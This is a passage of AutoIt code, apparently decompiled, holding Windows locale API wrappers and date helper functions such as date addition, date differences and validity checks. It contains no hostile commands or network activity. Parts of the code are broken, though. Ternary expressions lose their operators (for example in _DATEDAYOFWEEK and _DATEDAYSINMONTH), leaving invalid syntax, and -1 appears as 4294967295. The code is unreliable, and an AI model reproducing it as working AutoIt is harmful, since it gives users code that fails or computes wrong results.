$LOCALE_SABBREVMONTHNAME12 = 79 GLOBAL CONST $LOCALE_SABBREVMONTHNAME13 = 4111 GLOBAL CONST $LOCALE_SPOSITIVESIGN = 80 GLOBAL CONST $LOCALE_SNEGATIVESIGN = 81 GLOBAL CONST $LOCALE_IPOSSIGNPOSN = 82 GLOBAL CONST $LOCALE_INEGSIGNPOSN = 83 GLOBAL CONST $LOCALE_IPOSSYMPRECEDES = 84 GLOBAL CONST $LOCALE_IPOSSEPBYSPACE = 85 GLOBAL CONST $LOCALE_INEGSYMPRECEDES = 86 GLOBAL CONST $LOCALE_INEGSEPBYSPACE = 87 GLOBAL CONST $LOCALE_FONTSIGNATURE = 88 GLOBAL CONST $LOCALE_SISO639LANGNAME = 89 GLOBAL CONST $LOCALE_SISO3166CTRYNAME = 90 GLOBAL CONST $LOCALE_IDEFAULTEBCDICCODEPAGE = 4114 GLOBAL CONST $LOCALE_IPAPERSIZE = 4106 GLOBAL CONST $LOCALE_SENGCURRNAME = 4103 GLOBAL CONST $LOCALE_SNATIVECURRNAME = 4104 GLOBAL CONST $LOCALE_SYEARMONTH = 4102 GLOBAL CONST $LOCALE_SSORTNAME = 4115 GLOBAL CONST $LOCALE_IDIGITSUBSTITUTION = 4116 GLOBAL CONST $LOCALE_CUSTOM_DEFAULT = 3072 GLOBAL CONST $LOCALE_CUSTOM_UI_DEFAULT = 5120 GLOBAL CONST $LOCALE_CUSTOM_UNSPECIFIED = 4096 GLOBAL CONST $LOCALE_INVARIANT = 127 GLOBAL CONST $LOCALE_SYSTEM_DEFAULT = 2048 GLOBAL CONST $LOCALE_USER_DEFAULT = 1024 GLOBAL CONST $TIME_FORCE24HOURFORMAT = 8 GLOBAL CONST $TIME_NOMINUTESORSECONDS = 1 GLOBAL CONST $TIME_NOSECONDS = 2 GLOBAL CONST $TIME_NOTIMEMARKER = 4 GLOBAL CONST $LCID_INSTALLED = 1 GLOBAL CONST $LCID_SUPPORTED = 2 #Region Global Variables and Constants GLOBAL CONST $TAGNUMBERFMT = "uint NumDigits;uint LeadingZero;uint Grouping;ptr DecimalSep;ptr ThousandSep;uint NegativeOrder" #EndRegion Global Variables and Constants #Region Functions list #EndRegion Functions list #Region Public Functions FUNC _WINAPI_COMPARESTRING ($ILCID , $SSTRING1 , $SSTRING2 , $IFLAGS = 0 ) LOCAL $ARET = DLLCALL ("kernel32.dll" , "int" , "CompareStringW" , "dword" , $ILCID , "dword" , $IFLAGS , "wstr" , $SSTRING1 , "int" , + 4294967295 , "wstr" , $SSTRING2 , "int" , + 4294967295 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_CREATENUMBERFORMATINFO ($INUMDIGITS , $ILEADINGZERO , $IGROUPING , $SDECIMALSEP , $STHOUSANDSEP , $INEGATIVEORDER ) LOCAL $TFMT = DLLSTRUCTCREATE ($TAGNUMBERFMT & ";wchar[" & (STRINGLEN ($SDECIMALSEP ) + 1 ) & "];wchar[" & (STRINGLEN ($STHOUSANDSEP ) + 1 ) & "]" ) DLLSTRUCTSETDATA ($TFMT , 1 , $INUMDIGITS ) DLLSTRUCTSETDATA ($TFMT , 2 , $ILEADINGZERO ) DLLSTRUCTSETDATA ($TFMT , 3 , $IGROUPING ) DLLSTRUCTSETDATA ($TFMT , 4 , DLLSTRUCTGETPTR ($TFMT , 7 ) ) DLLSTRUCTSETDATA ($TFMT , 5 , DLLSTRUCTGETPTR ($TFMT , 8 ) ) DLLSTRUCTSETDATA ($TFMT , 6 , $INEGATIVEORDER ) DLLSTRUCTSETDATA ($TFMT , 7 , $SDECIMALSEP ) DLLSTRUCTSETDATA ($TFMT , 8 , $STHOUSANDSEP ) RETURN $TFMT ENDFUNC FUNC _WINAPI_ENUMSYSTEMGEOID () LOCAL $HENUMPROC = DLLCALLBACKREGISTER ("__EnumGeoIDProc" , "bool" , "long" ) DIM $__G_VENUM [101 ] = [0 ] LOCAL $ARET = DLLCALL ("kernel32.dll" , "bool" , "EnumSystemGeoID" , "dword" , 16 , "long" , 0 , "ptr" , DLLCALLBACKGETPTR ($HENUMPROC ) ) IF @ERROR OR NOT $ARET [0 ] OR NOT $__G_VENUM [0 ] THEN $__G_VENUM = @ERROR + 10 ENDIF DLLCALLBACKFREE ($HENUMPROC ) IF $__G_VENUM THEN RETURN SETERROR ($__G_VENUM , 0 , 0 ) __INC ($__G_VENUM , + 4294967295 ) RETURN $__G_VENUM ENDFUNC FUNC _WINAPI_ENUMSYSTEMLOCALES ($IFLAG ) LOCAL $HENUMPROC = DLLCALLBACKREGISTER ("__EnumLocalesProc" , "bool" , "ptr" ) DIM $__G_VENUM [101 ] = [0 ] LOCAL $ARET = DLLCALL ("kernel32.dll" , "bool" , "EnumSystemLocalesW" , "ptr" , DLLCALLBACKGETPTR ($HENUMPROC ) , "dword" , $IFLAG ) IF @ERROR OR NOT $ARET [0 ] OR NOT $__G_VENUM [0 ] THEN $__G_VENUM = @ERROR + 10 ENDIF DLLCALLBACKFREE ($HENUMPROC ) IF $__G_VENUM THEN RETURN SETERROR ($__G_VENUM , 0 , 0 ) __INC ($__G_VENUM , + 4294967295 ) RETURN $__G_VENUM ENDFUNC FUNC _WINAPI_ENUMUILANGUAGES ($IFLAG = 0 ) LOCAL $HENUMPROC = DLLCALLBACKREGISTER ("__EnumUILanguagesProc" , "bool" , "ptr;long_ptr" ) LOCAL $IID = 1 IF $__WINVER >= 1536 THEN IF BITAND ($IFLAG , 8 ) THEN $IID = 0 ENDIF ELSE $IFLAG = 0 ENDIF DIM $__G_VENUM [101 ] = [0 ] LOCAL $ARET = DLLCALL ("kernel32.dll" , "bool" , "EnumUILanguagesW" , "ptr" , DLLCALLBACKGETPTR ($HENUMPROC ) , "dword" , $IFLAG , "long_ptr" , $IID ) IF @ERROR OR NOT $ARET [0 ] OR NOT $__G_VENUM [0 ] THEN $__G_VENUM = @ERROR + 10 ENDIF DLLCALLBACKFREE ($HENUMPROC ) IF $__G_VENUM THEN RETURN SETERROR ($__G_VENUM , 0 , 0 ) __INC ($__G_VENUM , + 4294967295 ) RETURN $__G_VENUM ENDFUNC FUNC _WINAPI_GETDATEFORMAT ($ILCID = 0 , $TSYSTEMTIME = 0 , $IFLAGS = 0 , $SFORMAT = "" ) IF NOT $ILCID THEN $ILCID = 1024 LOCAL $STYPEOFFORMAT = "wstr" IF NOT STRINGSTRIPWS ($SFORMAT , $STR_STRIPLEADING + $STR_STRIPTRAILING ) THEN $STYPEOFFORMAT = "ptr" $SFORMAT = 0 ENDIF LOCAL $ARET = DLLCALL ("kernel32.dll" , "int" , "GetDateFormatW" , "dword" , $ILCID , "dword" , $IFLAGS , "struct*" , $TSYSTEMTIME , $STYPEOFFORMAT , $SFORMAT , "wstr" , "" , "int" , 2048 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN $ARET [5 ] ENDFUNC FUNC _WINAPI_GETDURATIONFORMAT ($ILCID , $IDURATION , $SFORMAT = "" ) IF NOT $ILCID THEN $ILCID = 1024 LOCAL $PST , $IVAL IF ISDLLSTRUCT ($IDURATION ) THEN $PST = DLLSTRUCTGETPTR ($IDURATION ) $IVAL = 0 ELSE $PST = 0 $IVAL = $IDURATION ENDIF LOCAL $STYPEOFFORMAT = "wstr" IF NOT STRINGSTRIPWS ($SFORMAT , $STR_STRIPLEADING + $STR_STRIPTRAILING ) THEN $STYPEOFFORMAT = "ptr" $SFORMAT = 0 ENDIF LOCAL $ARET = DLLCALL ("kernel32.dll" , "int" , "GetDurationFormat" , "dword" , $ILCID , "dword" , 0 , "ptr" , $PST , "uint64" , $IVAL , $STYPEOFFORMAT , $SFORMAT , "wstr" , "" , "int" , 2048 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN $ARET [6 ] ENDFUNC FUNC _WINAPI_GETGEOINFO ($IGEOID , $ITYPE , $ILANGUAGE = 0 ) LOCAL $ARET = DLLCALL ("kernel32.dll" , "int" , "GetGeoInfoW" , "long" , $IGEOID , "dword" , $ITYPE , "wstr" , "" , "int" , 4096 , "word" , $ILANGUAGE ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [3 ] ENDFUNC FUNC _WINAPI_GETLOCALEINFO ($ILCID , $ITYPE ) LOCAL $ARET = DLLCALL ("kernel32.dll" , "int" , "GetLocaleInfoW" , "dword" , $ILCID , "dword" , $ITYPE , "wstr" , "" , "int" , 2048 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , "" ) RETURN $ARET [3 ] ENDFUNC FUNC _WINAPI_GETNUMBERFORMAT ($ILCID , $SNUMBER , $TNUMBERFMT = 0 ) IF NOT $ILCID THEN $ILCID = 1024 LOCAL $ARET = DLLCALL ("kernel32.dll" , "int" , "GetNumberFormatW" , "dword" , $ILCID , "dword" , 0 , "wstr" , $SNUMBER , "struct*" , $TNUMBERFMT , "wstr" , "" , "int" , 2048 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN $ARET [5 ] ENDFUNC FUNC _WINAPI_GETSYSTEMDEFAULTLANGID () LOCAL $ARET = DLLCALL ("kernel32.dll" , "word" , "GetSystemDefaultLangID" ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETSYSTEMDEFAULTLCID () LOCAL $ARET = DLLCALL ("kernel32.dll" , "dword" , "GetSystemDefaultLCID" ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETSYSTEMDEFAULTUILANGUAGE () LOCAL $ARET = DLLCALL ("kernel32.dll" , "word" , "GetSystemDefaultUILanguage" ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETTHREADLOCALE () LOCAL $ARET = DLLCALL ("kernel32.dll" , "dword" , "GetThreadLocale" ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETTHREADUILANGUAGE () LOCAL $ARET = DLLCALL ("kernel32.dll" , "word" , "GetThreadUILanguage" ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETTIMEFORMAT ($ILCID = 0 , $TSYSTEMTIME = 0 , $IFLAGS = 0 , $SFORMAT = "" ) IF NOT $ILCID THEN $ILCID = 1024 LOCAL $STYPEOFFORMAT = "wstr" IF NOT STRINGSTRIPWS ($SFORMAT , $STR_STRIPLEADING + $STR_STRIPTRAILING ) THEN $STYPEOFFORMAT = "ptr" $SFORMAT = 0 ENDIF LOCAL $ARET = DLLCALL ("kernel32.dll" , "int" , "GetTimeFormatW" , "dword" , $ILCID , "dword" , $IFLAGS , "struct*" , $TSYSTEMTIME , $STYPEOFFORMAT , $SFORMAT , "wstr" , "" , "int" , 2048 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , "" ) RETURN $ARET [5 ] ENDFUNC FUNC _WINAPI_GETUSERDEFAULTLANGID () LOCAL $ARET = DLLCALL ("kernel32.dll" , "word" , "GetUserDefaultLangID" ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETUSERDEFAULTLCID () LOCAL $ARET = DLLCALL ("kernel32.dll" , "dword" , "GetUserDefaultLCID" ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETUSERDEFAULTUILANGUAGE () LOCAL $ARET = DLLCALL ("kernel32.dll" , "word" , "GetUserDefaultUILanguage" ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETUSERGEOID () LOCAL $ARET = DLLCALL ("kernel32.dll" , "long" , "GetUserGeoID" , "uint" , 16 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , + 4294967295 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_ISVALIDLOCALE ($ILCID , $IFLAG = 0 ) LOCAL $ARET = DLLCALL ("kernel32.dll" , "bool" , "IsValidLocale" , "dword" , $ILCID , "dword" , $IFLAG ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SETLOCALEINFO ($ILCID , $ITYPE , $SDATA ) LOCAL $ARET = DLLCALL ("kernel32.dll" , "bool" , "SetLocaleInfoW" , "dword" , $ILCID , "dword" , $ITYPE , "wstr" , $SDATA ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SETTHREADLOCALE ($ILCID ) LOCAL $ARET = DLLCALL ("kernel32.dll" , "bool" , "SetThreadLocale" , "dword" , $ILCID ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SETTHREADUILANGUAGE ($ILANGUAGE ) LOCAL $ARET = DLLCALL ("kernel32.dll" , "word" , "SetThreadUILanguage" , "word" , $ILANGUAGE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN ($ARET [0 ] = $ARET [1 ] ) ENDFUNC FUNC _WINAPI_SETUSERGEOID ($IGEOID ) LOCAL $ARET = DLLCALL ("kernel32.dll" , "bool" , "SetUserGeoID" , "long" , $IGEOID ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC #EndRegion Public Functions #Region Internal Functions FUNC __ENUMGEOIDPROC ($IID ) __INC ($__G_VENUM ) $__G_VENUM [$__G_VENUM [0 ] ] = $IID RETURN 1 ENDFUNC FUNC __ENUMLOCALESPROC ($PLOCALE ) __INC ($__G_VENUM ) $__G_VENUM [$__G_VENUM [0 ] ] = DEC (DLLSTRUCTGETDATA (DLLSTRUCTCREATE ("wchar[" & (_WINAPI_STRLEN ($PLOCALE ) + 1 ) & "]" , $PLOCALE ) , 1 ) ) RETURN 1 ENDFUNC FUNC __ENUMUILANGUAGESPROC ($PLANGUAGE , $IID ) __INC ($__G_VENUM ) $__G_VENUM [$__G_VENUM [0 ] ] = DLLSTRUCTGETDATA (DLLSTRUCTCREATE ("wchar[" & (_WINAPI_STRLEN ($PLANGUAGE ) + 1 ) & "]" , $PLANGUAGE ) , 1 ) IF $IID THEN $__G_VENUM [$__G_VENUM [0 ] ] = DEC ($__G_VENUM [$__G_VENUM [0 ] ] ) ENDIF RETURN 1 ENDFUNC #EndRegion Internal Functions FUNC _DATEADD ($STYPE , $INUMBER , $SDATE ) LOCAL $ASTIMEPART [4 ] LOCAL $ASDATEPART [4 ] LOCAL $IJULIANDATE $STYPE = STRINGLEFT ($STYPE , 1 ) IF STRINGINSTR ("D,M,Y,w,h,n,s" , $STYPE ) = 0 OR $STYPE = "" THEN RETURN SETERROR (1 , 0 , 0 ) ENDIF IF NOT STRINGISINT ($INUMBER ) THEN RETURN SETERROR (2 , 0 , 0 ) ENDIF IF NOT _DATEISVALID ($SDATE ) THEN RETURN SETERROR (3 , 0 , 0 ) ENDIF _DATETIMESPLIT ($SDATE , $ASDATEPART , $ASTIMEPART ) IF $STYPE = "d" OR $STYPE = "w" THEN IF $STYPE = "w" THEN $INUMBER = $INUMBER * 7 $IJULIANDATE = _DATETODAYVALUE ($ASDATEPART [1 ] , $ASDATEPART [2 ] , $ASDATEPART [3 ] ) + $INUMBER _DAYVALUETODATE ($IJULIANDATE , $ASDATEPART [1 ] , $ASDATEPART [2 ] , $ASDATEPART [3 ] ) ENDIF IF $STYPE = "m" THEN $ASDATEPART [2 ] = $ASDATEPART [2 ] + $INUMBER WHILE $ASDATEPART [2 ] > 12 $ASDATEPART [2 ] = $ASDATEPART [2 ] + 4294967284 $ASDATEPART [1 ] = $ASDATEPART [1 ] + 1 WEND WHILE $ASDATEPART [2 ] < 1 $ASDATEPART [2 ] = $ASDATEPART [2 ] + 12 $ASDATEPART [1 ] = $ASDATEPART [1 ] + 4294967295 WEND ENDIF IF $STYPE = "y" THEN $ASDATEPART [1 ] = $ASDATEPART [1 ] + $INUMBER ENDIF IF $STYPE = "h" OR $STYPE = "n" OR $STYPE = "s" THEN LOCAL $ITIMEVAL = _TIMETOTICKS ($ASTIMEPART [1 ] , $ASTIMEPART [2 ] , $ASTIMEPART [3 ] ) / 1000 IF $STYPE = "h" THEN $ITIMEVAL = $ITIMEVAL + $INUMBER * 3600 IF $STYPE = "n" THEN $ITIMEVAL = $ITIMEVAL + $INUMBER * 60 IF $STYPE = "s" THEN $ITIMEVAL = $ITIMEVAL + $INUMBER LOCAL $IDAY2ADD = INT ($ITIMEVAL / (24 * 60 * 60 ) ) $ITIMEVAL = $ITIMEVAL - $IDAY2ADD * 24 * 60 * 60 IF $ITIMEVAL < 0 THEN $IDAY2ADD = $IDAY2ADD + 4294967295 $ITIMEVAL = $ITIMEVAL + 24 * 60 * 60 ENDIF $IJULIANDATE = _DATETODAYVALUE ($ASDATEPART [1 ] , $ASDATEPART [2 ] , $ASDATEPART [3 ] ) + $IDAY2ADD _DAYVALUETODATE ($IJULIANDATE , $ASDATEPART [1 ] , $ASDATEPART [2 ] , $ASDATEPART [3 ] ) _TICKSTOTIME ($ITIMEVAL * 1000 , $ASTIMEPART [1 ] , $ASTIMEPART [2 ] , $ASTIMEPART [3 ] ) ENDIF LOCAL $INUMDAYS = _DAYSINMONTH ($ASDATEPART [1 ] ) IF $INUMDAYS [$ASDATEPART [2 ] ] < $ASDATEPART [3 ] THEN $ASDATEPART [3 ] = $INUMDAYS [$ASDATEPART [2 ] ] $SDATE = $ASDATEPART [1 ] & "/" & STRINGRIGHT ("0" & $ASDATEPART [2 ] , 2 ) & "/" & STRINGRIGHT ("0" & $ASDATEPART [3 ] , 2 ) IF $ASTIMEPART [0 ] > 0 THEN IF $ASTIMEPART [0 ] > 2 THEN $SDATE = $SDATE & " " & STRINGRIGHT ("0" & $ASTIMEPART [1 ] , 2 ) & ":" & STRINGRIGHT ("0" & $ASTIMEPART [2 ] , 2 ) & ":" & STRINGRIGHT ("0" & $ASTIMEPART [3 ] , 2 ) ELSE $SDATE = $SDATE & " " & STRINGRIGHT ("0" & $ASTIMEPART [1 ] , 2 ) & ":" & STRINGRIGHT ("0" & $ASTIMEPART [2 ] , 2 ) ENDIF ENDIF RETURN $SDATE ENDFUNC FUNC _DATEDAYOFWEEK ($IDAYNUM , $IFORMAT = DEFAULT ) LOCAL CONST $MONDAY_IS_NO1 = 128 IF $IFORMAT = DEFAULT THEN $IFORMAT = 0 $IDAYNUM = INT ($IDAYNUM ) IF $IDAYNUM < 1 OR $IDAYNUM > 7 THEN RETURN SETERROR (1 , 0 , "" ) LOCAL $TSYSTEMTIME = DLLSTRUCTCREATE ($TAGSYSTEMTIME ) DLLSTRUCTSETDATA ($TSYSTEMTIME , "Year" , BITAND ($IFORMAT , $MONDAY_IS_NO1 ) 2007 2006 ) DLLSTRUCTSETDATA ($TSYSTEMTIME , "Month" , 1 ) DLLSTRUCTSETDATA ($TSYSTEMTIME , "Day" , $IDAYNUM ) RETURN _WINAPI_GETDATEFORMAT (BITAND ($IFORMAT , $DMW_LOCALE_LONGNAME ) $LOCALE_USER_DEFAULT $LOCALE_INVARIANT , $TSYSTEMTIME , 0 , BITAND ($IFORMAT , $DMW_SHORTNAME ) "ddd" "dddd" ) ENDFUNC FUNC _DATEDAYSINMONTH ($IYEAR , $IMONTHNUM ) $IMONTHNUM = INT ($IMONTHNUM ) $IYEAR = INT ($IYEAR ) RETURN __DATEISMONTH ($IMONTHNUM ) AND __DATEISYEAR ($IYEAR ) _DAYSINMONTH ($IYEAR ) [$IMONTHNUM ] SETERROR (1 , 0 , 0 ) ENDFUNC FUNC _DATEDIFF ($STYPE , $SSTARTDATE , $SENDDATE ) $STYPE = STRINGLEFT ($STYPE , 1 ) IF STRINGINSTR ("d,m,y,w,h,n,s" , $STYPE ) = 0 OR $STYPE = "" THEN RETURN SETERROR (1 , 0 , 0 ) ENDIF IF NOT _DATEISVALID ($SSTARTDATE ) THEN RETURN SETERROR (2 , 0 , 0 ) ENDIF IF NOT _DATEISVALID ($SENDDATE ) THEN RETURN SETERROR (3 , 0 , 0 ) ENDIF LOCAL $ASSTARTDATEPART [4 ] , $ASSTARTTIMEPART [4 ] , $ASENDDATEPART [4 ] , $ASENDTIMEPART [4 ] _DATETIMESPLIT ($SSTARTDATE , $ASSTARTDATEPART , $ASSTARTTIMEPART ) _DATETIMESPLIT ($SENDDATE , $ASENDDATEPART , $ASENDTIMEPART ) LOCAL $ADAYSDIFF = _DATETODAYVALUE ($ASENDDATEPART [1 ] , $ASENDDATEPART [2 ] , $ASENDDATEPART [3 ] ) - _DATETODAYVALUE ($ASSTARTDATEPART [1 ] , $ASSTARTDATEPART [2 ] , $ASSTARTDATEPART [3 ] ) LOCAL $ITIMEDIFF , $IYEARDIFF , $ISTARTTIMEINSECS , $IENDTIMEINSECS IF $ASSTARTTIMEPART [0 ] > 1 AND $ASENDTIMEPART [0 ] > 1 THEN $ISTARTTIMEINSECS = $ASSTARTTIMEPART [1 ] * 3600 + $ASSTARTTIMEPART [2 ] * 60 + $ASSTARTTIMEPART [3 ] $IENDTIMEINSECS = $ASENDTIMEPART [1 ] * 3600 + $ASENDTIMEPART [2 ] * 60 + $ASENDTIMEPART [3 ] $ITIMEDIFF = $IENDTIMEINSECS - $ISTARTTIMEINSECS IF $ITIMEDIFF < 0 THEN $ADAYSDIFF = $ADAYSDIFF + 4294967295 $ITIMEDIFF = $ITIMEDIFF + 24 * 60 * 60 ENDIF ELSE $ITIMEDIFF = 0 ENDIF SELECT CASE $STYPE = "d" RETURN $ADAYSDIFF CASE $STYPE = "m" $IYEARDIFF = $ASENDDATEPART [1 ] - $ASSTARTDATEPART [1 ] LOCAL $IMONTHDIFF = $ASENDDATEPART [2 ] - $ASSTARTDATEPART [2 ] + $IYEARDIFF * 12 IF $ASENDDATEPART [3 ] < $ASSTARTDATEPART [3 ] THEN $IMONTHDIFF = $IMONTHDIFF + 4294967295 $ISTARTTIMEINSECS = $ASSTARTTIMEPART [1 ] * 3600 + $ASSTARTTIMEPART [2 ] * 60 + $ASSTARTTIMEPART [3 ] $IENDTIMEINSECS = $ASENDTIMEPART [1 ] * 3600 + $ASENDTIMEPART [2 ] * 60 + $ASENDTIMEPART [3 ] $ITIMEDIFF = $IENDTIMEINSECS - $ISTARTTIMEINSECS IF $ASENDDATEPART [3 ] = $ASSTARTDATEPART [3 ] AND $ITIMEDIFF < 0 THEN $IMONTHDIFF = $IMONTHDIFF + 4294967295 RETURN $IMONTHDIFF CASE $STYPE = "y" $IYEARDIFF = $ASENDDATEPART [1 ] - $ASSTARTDATEPART [1 ] IF $ASENDDATEPART [2 ] < $ASSTARTDATEPART [2 ] THEN $IYEARDIFF = $IYEARDIFF + 4294967295 IF $ASENDDATEPART [2 ] = $ASSTARTDATEPART [2 ] AND $ASENDDATEPART [3 ] < $ASSTARTDATEPART [3 ] THEN $IYEARDIFF = $IYEARDIFF + 4294967295 $ISTARTTIMEINSECS = $ASSTARTTIMEPART [1 ] * 3600 + $ASSTARTTIMEPART [2 ] * 60 + $ASSTARTTIMEPART [3 ] $IENDTIMEINSECS = $ASENDTIMEPART [1 ] * 3600 + $ASENDTIMEPART [2 ] * 60 + $ASENDTIMEPART [3 ] $ITIMEDIFF = $IENDTIMEINSECS - $ISTARTTIMEINSECS IF $ASENDDATEPART [2 ] = $ASSTARTDATEPART [2 ] AND $ASENDDATEPART [3 ] = $ASSTARTDATEPART [3 ] AND $ITIMEDIFF < 0 THEN $IYEARDIFF = $IYEARDIFF + 4294967295 RETURN $IYEARDIFF CASE $STYPE = "w" RETURN INT ($ADAYSDIFF / 7 ) CASE $STYPE = "h" RETURN $ADAYSDIFF * 24 + INT ($ITIMEDIFF / 3600 ) CASE $STYPE = "n" RETURN $ADAYSDIFF * 24 * 60 + INT ($ITIMEDIFF / 60 ) CASE $STYPE = "s" RETURN $ADAYSDIFF * 24 * 60 * 60 + $ITIMEDIFF ENDSELECT ENDFUNC FUNC _DATEISLEAPYEAR ($IYEAR ) IF STRINGISINT ($IYEAR ) THEN SELECT CASE MOD ($IYEAR , 4 ) = 0 AND MOD ($IYEAR , 100 ) <> 0 RETURN 1 CASE MOD ($IYEAR , 400 ) = 0 RETURN 1 CASE ELSE RETURN 0 ENDSELECT ENDIF RETURN SETERROR (1 , 0 , 0 ) ENDFUNC FUNC __DATEISMONTH ($INUMBER ) $INUMBER = INT ($INUMBER ) RETURN $INUMBER >= 1 AND $INUMBER <= 12 ENDFUNC FUNC _DATEISVALID ($SDATE ) LOCAL $ASDATEPART [4 ] , $ASTIMEPART [4 ] _DATETIMESPLIT ($SDATE , $ASDATEPART , $ASTIMEPART ) IF NOT STRINGISINT ($ASDATEPART [1 ] ) THEN RETURN 0 IF NOT STRINGISINT ($ASDATEPART [2 ] ) THEN RETURN 0 IF NOT STRINGISINT ($ASDATEPART [3 ] ) THEN RETURN 0 $ASDATEPART [1 ] = INT ($ASDATEPART [1 ] ) $ASDATEPART [2 ] = INT ($ASDATEPART [2 ] ) $ASDATEPART [3 ] = INT ($ASDATEPART [3 ] ) LOCAL $INUMDAYS = _DAYSINMONTH ($ASDATEPART [1 ] ) IF $ASDATEPART [1 ] < 1000 OR $ASDATEPART [1 ] > 2999 THEN RETURN 0 IF $ASDATEPART [2 ] < 1 OR $ASDATEPART [2 ] > 12 THEN RETURN 0 IF $ASDATEPART [3 ] < 1 OR $ASDATEPART [3 ] > $INUMDAYS [$ASDATEPART [2 ] ] THEN RETURN 0 IF $ASTIMEPART [0 ] < 1 THEN RETURN 1 IF $ASTIMEPART [0 ] < 2 THEN RETURN 0 IF $ASTIMEPART [0 ] = 2 THEN $ASTIMEPART [3 ] = "00" IF NOT STRINGISINT ($ASTIMEPART [1 ] ) THEN RETURN 0 IF NOT STRINGISINT ($ASTIMEPART [2 ] ) THEN RETURN 0 IF NOT STRINGISINT ($ASTIMEPART [3 ] ) THEN RETURN 0 $ASTIMEPART [1 ] = INT ($ASTIMEPART [1 ] ) $ASTIMEPART [2 ] = INT ($ASTIMEPART [2 ] ) $ASTIMEPART [3 ] = INT ($ASTIMEPART [3 ] ) IF $ASTIMEPART [1 ] < 0 OR $ASTIMEPART [1 ] > 23 THEN RETURN 0 IF $ASTIMEPART [2 ] < 0 OR $ASTIMEPART [2 ] > 59 THEN RETURN 0 IF $ASTIMEPART [3 ] < 0 OR $ASTIMEPART [3 ] > 59 THEN RETURN 0 RETURN 1 ENDFUNC FUNC __DATEISYEAR ($INUMBER ) RETURN STRINGLEN ($INUMBER ) = 4 ENDFUNC FUNC _DATELASTWEEKDAYNUM ($IWEEKDAYNUM ) SELECT CASE NOT STRINGISINT ($IWEEKDAYNUM ) RETURN SETERROR (1 , 0 , 0 ) CASE $IWEEKDAYNUM < 1 OR $IWEEKDAYNUM > 7 RETURN SETERROR (2 , 0 , 0 ) CASE ELSE LOCAL $ILASTWEEKDAYNUM IF $IWEEKDAYNUM = 1 THEN $ILASTWEEKDAYNUM = 7 ELSE $ILASTWEEKDAYNUM = $IWEEKDAYNUM + 4294967295 ENDIF RETURN $ILASTWEEKDAYNUM ENDSELECT ENDFUNC FUNC _DATELASTMONTHNUM ($IMONTHNUM ) SELECT CASE NOT STRINGISINT ($IMONTHNUM ) RETURN SETERROR (1 , 0 , 0 ) CASE NOT __DATEISMONTH ($IMONTHNUM ) RETURN SETERROR (2 , 0 , 0 ) CASE ELSE LOCAL $ILASTMONTHNUM IF $IMONTHNUM = 1 THEN $ILASTMONTHNUM = 12 ELSE $ILASTMONTHNUM = $IMONTHNUM + 4294967295 ENDIF $ILASTMONTHNUM = STRINGFORMAT ("%02d" , $ILASTMONTHNUM ) RETURN $ILASTMONTHNUM ENDSELECT ENDFUNC FUNC _DATELASTMONTHYEAR ($IMONTHNUM , $IYEAR ) SELECT CASE NOT STRINGISINT ($IMONTHNUM ) OR NOT STRINGISINT ($IYEAR ) RETURN SETERROR (1 , 0 , 0 ) CASE NOT __DATEISMONTH ($IMONTHNUM ) RETURN SETERROR (2 , 0 , 0 ) CASE ELSE LOCAL $ILASTYEAR IF $IMONTHNUM = 1 THEN $ILASTYEAR = $IYEAR + 4294967295 ELSE $ILASTYEAR = $IYEAR ENDIF $ILASTYEAR = STRINGFORMAT ("%04d" , $ILASTYEAR ) RETURN $ILASTYEAR ENDSELECT ENDFUNC FUNC _DATENEXTWEEKDAYNUM ($IWEEKDAYNUM ) SELECT CASE NOT STRINGISINT ($IWEEKDAYNUM ) RETURN SETERROR (1 , 0 , 0 ) CASE $IWEEKDAYNUM < 1 OR $IWEEKDAYNUM > 7 RETURN SETERROR (2 , 0 , 0 ) CASE ELSE LOCAL $INEXTWEEKDAYNUM IF $IWEEKDAYNUM = 7 THEN $INEXTWEEKDAYNUM = 1 ELSE $INEXTWEEKDAYNUM = $IWEEKDAYNUM + 1 ENDIF RETURN $INEXTWEEKDAYNUM ENDSELECT ENDFUNC FUNC 